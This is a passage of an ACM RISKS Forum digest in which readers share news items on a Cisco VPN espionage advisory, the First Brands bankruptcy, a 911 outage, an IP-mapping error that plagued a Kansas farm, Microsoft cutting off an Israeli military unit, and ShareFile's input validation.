    https://this.weekinsecurity.com/discord-says-users-government-ids-used-for-age-checks-stolen-by-hackers/

    ------------------------------

    Date: Fri, 26 Sep 2025 15:23:40 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Federal cyber agency warns of 'serious and urgent' attack on
    tech used by remote workers (CBC)

    https://www.cbc.ca/news/politics/cisco-cyber-attack-vpn-1.7644591

    Government cyber-agencies around the world are rushing to clamp down on
    what appears to be an advanced and sophisticated espionage campaign
    targeting popular security software used by remote workers.

    Calling the threat "serious and urgent," Canada's Communication Security Establishment's (CSE) Centre for Cyber Security joined its international
    allies Thursday urging organizations to take immediate action to patch up vulnerabilities following a widespread hit on the technology security
    company Cisco.

    ------------------------------

    Date: Sat, 11 Oct 2025 12:44:20 -0400
    From: "Gabe Goldberg" <gabe@gabegold.com>
    Subject: Billions of Dollars ‘Vanished’: Low-Profile Bankruptcy Rings Alarms
    on Wall Street (The New York Times)

    The unraveling of First Brands, a midsize auto-parts maker, is exposing
    hidden losses at international banks and “private credit” lenders.

    Unlike traditional banks, private credit lenders say, they have the
    ability to lend quickly because they understand complicated, risky
    businesses and do not need to worry about repaying ordinary depositors
    or reporting public earnings.

    Trillions of dollars have been plowed into private credit over the past
    decade, principally from pension funds, endowments and other groups that
    rely on such investments to fulfill obligations to retirees and the like. Editors’ Picks
    Out of This World Fashion for Life on Earth
    Should I Keep Donating to an Animal Shelter That Treats Employees Badly?
    Can I Take Batteries on a Plane? What to Know Before You Fly.

    The Trump administration made moves this summer to allow 401(k) plans to
    invest savings into the private equity funds that extend private credit
    to companies, raising the stakes even further.

    The First Brands bankruptcy could amount to something of an
    I-told-you-so moment for the traditional bankers and private-credit
    skeptics who have long maintained that these upstart lenders deserve
    more scrutiny.

    https://www.nytimes.com/2025/10/10/business/first-brands-bankruptcy-wall-street.html?smid=nytcore-ios-share&referringSource=articleShare

    ------------------------------

    Date: Thu, 25 Sep 2025 23:08:03 -0600
    From: "Matthew Kruk" <mkrukg@gmail.com>
    Subject: 911 Service Is Restored in Louisiana and Mississippi (NYTimes)

    https://www.nytimes.com/2025/09/25/us/mississippi-louisiana-outages-911-emergency.html

    Emergency call service was disrupted across Louisiana and Mississippi for
    more than two hours on Thursday afternoon, officials said, citing damage to fiber optic lines operated by AT&T.

    Gov. Tate Reeves of Mississippi said that the state’s Emergency Management Agency had received reports that AT&T was responding to “a series of fiber cuts,” which he said had interrupted service in Mississippi and Louisiana.

    Scott Simmons, a spokesman for the Mississippi Emergency Management Agency, said there were no indications of foul play, and that AT&T was
    investigating.

    ------------------------------

    Date: Thu, 2 Oct 2025 08:44:19 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: How an Internet mapping glitch turned a random Kansas farm into a
    digital hell (Fusion)

    EXCERPT:
    An hour’s drive from Wichita, Kansas, in a little town called Potwin, there is a 360-acre piece of land with a very big problem.

    The plot has been owned by the Vogelman family for more than a hundred
    years, though the current owner, Joyce Taylor née Vogelman, 82, now rents
    it out. The acreage is quiet and remote: a farm, a pasture, an old orchard,
    two barns, some hog shacks and a two-story house. It’s the kind of place
    you move to if you want to get away from it all. The nearest neighbor is a
    mile away, and the closest big town has just 13,000 people. It is real,
    rural America; in fact, it’s a two-hour drive from the exact geographical center of the United States.

    But instead of being a place of respite, the people who live on Joyce Taylor’s land find themselves in a technological horror story.

    For the last decade, Taylor and her renters have been visited by all kinds
    of mysterious trouble. They've been accused of being identity thieves, spammers, scammers and fraudsters. They've gotten visited by FBI agents, federal marshals, IRS collectors, ambulances searching for suicidal
    veterans, and police officers searching for runaway children. They've found people scrounging around in their barn. The renters have been doxxed, their names and addresses posted on the Internet by vigilantes. Once, someone
    left a broken toilet in the driveway as a strange, indefinite threat.

    All in all, the residents of the Taylor property have been treated like criminals for a decade. And until I called them this week, they had no idea why.

    To understand what happened to the Taylor farm, you have to know a little
    bit about how digital cartography works in the modern era—in particular, a form of location service known as “IP mapping:. [...]

    https://archive.ph/zHha3

    ------------------------------

    Date: Fri, 26 Sep 2025 13:04:28 +0300
    From: Amos Shapir <amos083@gmail.com>
    Subject: Microsoft cuts off cloud services to Israeli military unit (NBC)

    I don't know which is more unsettling: That a private company takes action against a sovereign nation's military at war -- or that a nation at war
    keeps some of its top secrets on a cloud managed by a foreign private
    company.

    ------------------------------

    Date: Fri, 26 Sep 2025 10:42:17 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: ShareFile website

    I recently had to set up an account on ShareFile.

    (1) I used the Firefox feature to generate a strong password. The website
    said there was a "bad character" in the generated password. It wouldn't say *which* character, so I had to go through taking out characters one at a
    time until it was happy. It turned out to be "<". Presumably, this
    character triggered a bug in their software somewhere. Rather than fix the
    bug, they added a check to prevent this character from appearing in
    passwords

    (2) I pasted in my phone number and it complained that spaces are not
    allowed in phone numbers. The computer code to strip spaces from a phone number is not particularly difficult or complex to write: they had already implemented the code to check for spaces. But I had to manually execute the process of stripping spaces from

    These are irritants rather than security hazards: but given that the quality
    of the customer-facing interface software is so poor, it does not inspire
    much confidence in the security of their file sharing software generally.

    At least the file I was sharing was encrypted before uploading to the
    ShareFile site!

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.77
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Thu Oct 16 17:00:45 2025